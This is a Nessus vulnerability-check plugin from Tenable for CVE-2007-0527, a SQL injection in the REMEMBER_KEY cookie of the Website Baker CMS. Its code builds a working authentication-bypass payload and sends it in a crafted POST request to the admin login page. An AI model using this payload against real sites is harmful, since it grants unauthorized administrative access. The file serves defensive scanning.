#
# (C) Tenable Network Security
#


if (description)
{
  script_id(24235);
  script_version("$Revision: 1.5 $");

  script_cve_id("CVE-2007-0527");
  script_bugtraq_id(22176);
  script_xref(name:"OSVDB", value:"32945");

  script_name(english:"Website Baker REMEMBER_KEY Cookie SQL Injection Vulnerability");
  script_summary(english:"Tries to bypass authentication with Website Baker");

  desc = "
Synopsis :

The remote web server contains a PHP script that is prone to a SQL
injection attack. 

Description :

The remote host is running Website Baker, a PHP-based content
management system. 

The installed version of Website Baker fails to validate input to the
'REMEMBER_KEY' cookie before using it in 'framework/class.login.php'
to construct SQL queries.  Provided PHP's 'magic_quotes_gpc' setting
is disabled, an unauthenticated remote attacker can leverage this
issue to manipulate database queries, possibly to gain administrative
access to the application or launch other sorts of SQL injection
attacks against the affected host. 

See also :

http://www.securityfocus.com/archive/1/457684/30/0/threaded

Solution :

Unknown at this time.

Risk factor :

Medium / CVSS Base Score : 6.8
(CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/wb", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Check whether the affected script exists.
  url = string(dir, "/admin/login/index.php");
  req = http_get(item:url, port:port);
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # If it does...
  if (
    ">Website Baker<" >< res &&
    'input type="hidden" name="username_fieldname"' >< res
  )
  {
    # Try to exploit the flaw to bypass authentication.
    exploit = "REMEMBER_KEY=00000000001_' or user_id='1";
    postdata = string(
      "remember=true&",
      "submit=Login"
    );
    req = string(
      "POST ", url, " HTTP/1.1\r\n",
      "Host: ", get_host_name(), "\r\n",
      "User-Agent: ", get_kb_item("global_settings/http_user_agent"), "\r\n",
      "Cookie: ", exploit, "\r\n",
      "Content-Type: application/x-www-form-urlencoded\r\n",
      "Content-Length: ", strlen(postdata), "\r\n",
      "\r\n",
      postdata
    );
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
    if (res == NULL) exit(0);

    # There's a problem if we're redirected to the admin start page.
    if (
      "REMEMBER_KEY=" &&
      egrep(pattern:"^Location: .+admin/start", string:res)
    )
    {
      security_warning(port);
      exit(0);
    }
  }
}
